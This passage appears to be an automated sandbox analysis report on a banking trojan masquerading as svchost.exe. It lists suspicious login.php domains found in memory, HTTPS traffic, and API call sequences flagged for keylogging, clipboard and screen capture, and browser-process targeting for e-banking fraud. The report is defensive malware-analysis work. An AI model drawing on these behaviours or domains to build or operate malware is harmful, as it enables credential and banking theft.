00000002.00000003.2083355602.00000000029A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9ehttp://ww16.vofycot.com/l
Source: svchost.exe, 00000002.00000003.2349662747.000000000B546000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557663546.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593592120.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351475687.000000000464A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2441645467.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369953601.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359613233.000000000B4A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524608844.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404604691.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576429245.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450513652.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2464658514.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420663159.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2416226275.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394184434.00000000029A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0
Source: svchost.exe, 00000002.00000003.2270666534.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2144731750.000000000087D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581192677.00000000029D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1415492981.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1375299092.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148950265.00000000029C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gahyqah.com/login.php
Source: svchost.exe, 00000002.00000003.2270666534.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148950265.00000000029C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gahyqah.com/login.phpX
Source: svchost.exe, svchost.exe, 00000002.00000003.2038084738.0000000000880000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793775330.0000000002927000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546989699.000000000B59E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2092240495.0000000006715000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2092240495.0000000006724000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2092848664.000000000B55C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004850062.000000000B4DB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2135970617.00000000046D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492191607.000000000B5C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567301862.000000000466E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425282961.0000000000880000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078383290.000000000B4D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2530731383.0000000002927000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797181717.00000000029E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142075721.000000000B553000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1894831807.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650789737.00000000066CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2102153944.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2567301862.000000000467A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: svchost.exe, 00000002.00000003.2559097035.000000000670F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2135970617.00000000046D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567301862.000000000467A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2063064652.0000000006618000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123555965.00000000029DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2096603295.0000000006717000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536103224.000000000B551000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031225695.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2111613635.000000000B56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2013936272.000000000661E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034217725.0000000006619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2365692304.000000000B561000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138738182.00000000046B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2038084738.0000000000878000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142352600.0000000004619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2261700677.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080112052.000000000088B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2018296118.000000000B4CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142075721.000000000B55E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2506530381.000000000B557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2140281844.000000000B55E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt
Source: svchost.exe, 00000002.00000003.2536103224.000000000B551000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2262404018.000000000B551000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434822380.000000000B54C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2436784051.000000000B54C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2429116618.000000000B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt#U
Source: svchost.exe, 00000002.00000003.1357214810.00000000029F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt-
Source: svchost.exe, 00000002.00000003.2142075721.000000000B553000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2262404018.000000000B551000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2465295118.000000000B553000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084997781.000000000B553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt4U
Source: svchost.exe, 00000002.00000003.2363361168.000000000B554000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142075721.000000000B553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtEU
Source: svchost.exe, 00000002.00000003.2043884959.00000000029D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148584433.000000000B5C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031225695.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123555965.00000000029D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536917533.00000000029D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtd
Source: svchost.exe, 00000002.00000003.2490872020.0000000006725000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2135962795.0000000006725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtmr
Source: svchost.exe, 00000002.00000003.2043884959.00000000029D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369953601.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095358476.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123555965.00000000029D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085113371.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtu
Source: svchost.exe, 00000002.00000003.2142075721.000000000B553000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413677903.000000000B554000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434822380.000000000B556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339536084.000000000B555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138728432.000000000B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536103224.000000000B557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2465295118.000000000B557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2135922643.000000000B554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtxU
Source: svchost.exe, 00000002.00000003.1650789737.00000000066CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796639933.0000000006795000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889211197.0000000006624000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2605273063.0000000006791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
Source: svchost.exe, 00000002.00000003.2266293470.00000000066A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2274103854.000000000B5C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034066748.0000000002913000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2589582786.0000000002918000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2355760334.0000000000869000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2340483768.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282216366.000000000B411000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797181717.00000000029DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352846166.000000000B534000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557412147.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2479266267.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2371312988.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B44F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/login.php
Source: svchost.exe, 00000002.00000003.1364657904.00000000066C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2149012437.0000000004505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364746448.00000000066C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151452523.0000000004505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364701124.00000000066C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789392843.00000000066C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/
Source: svchost.exe, 00000002.00000003.2149012437.0000000004505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151452523.0000000004505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com//
Source: svchost.exe, 00000002.00000003.1650761420.00000000066B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250648310.000000000460C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364803259.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250648310.0000000004609000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793845752.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650661125.0000000006615000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1373797577.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793360892.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1789493415.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151678696.00000000046C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2256311817.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364340115.000000000667A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364072195.0000000006675000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2135962795.0000000006716000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793717816.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1364274573.0000000006795000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2266296927.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581298263.00000000066BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/login.php
Source: svchost.exe, 00000002.00000003.2149012437.0000000004505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2151452523.0000000004505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/m/
Source: svchost.exe, 00000002.00000003.1650789737.00000000066CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796639933.0000000006795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/wp-json/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57343
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57344
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57343 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57344 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57350
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57351
Source: unknown Network traffic detected: HTTP traffic on port 57351 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57350 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:57343 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:57344 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:57350 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\apppatch\svchost.exe Code function: [tab] 2_2_02BC2F40
Source: C:\Windows\apppatch\svchost.exe Code function: [del] 2_2_02BC2F40
Source: C:\Windows\apppatch\svchost.exe Code function: [ins] 2_2_02BC2F40
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BC3220 memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,GlobalUnlock, 2_2_02BC3220
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BB9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 2_2_02BB9530
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 5_2_00699530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_00699530
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe Code function: 6_2_014D9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 6_2_014D9530
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BD54A0 Sleep,_snprintf,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,ReleaseDC, 2_2_02BD54A0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BC2F40 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii, 2_2_02BC2F40

E-Banking Fraud

Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BC78A0
Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,
GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe2_2_02BC6CA0
Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,
GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe2_2_02BC6CA0
Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,
GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe2_2_02BC6CA0
Source: C:\Windows\apppatch\svchost.exeCode function: IsUserAnAdmin,SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrS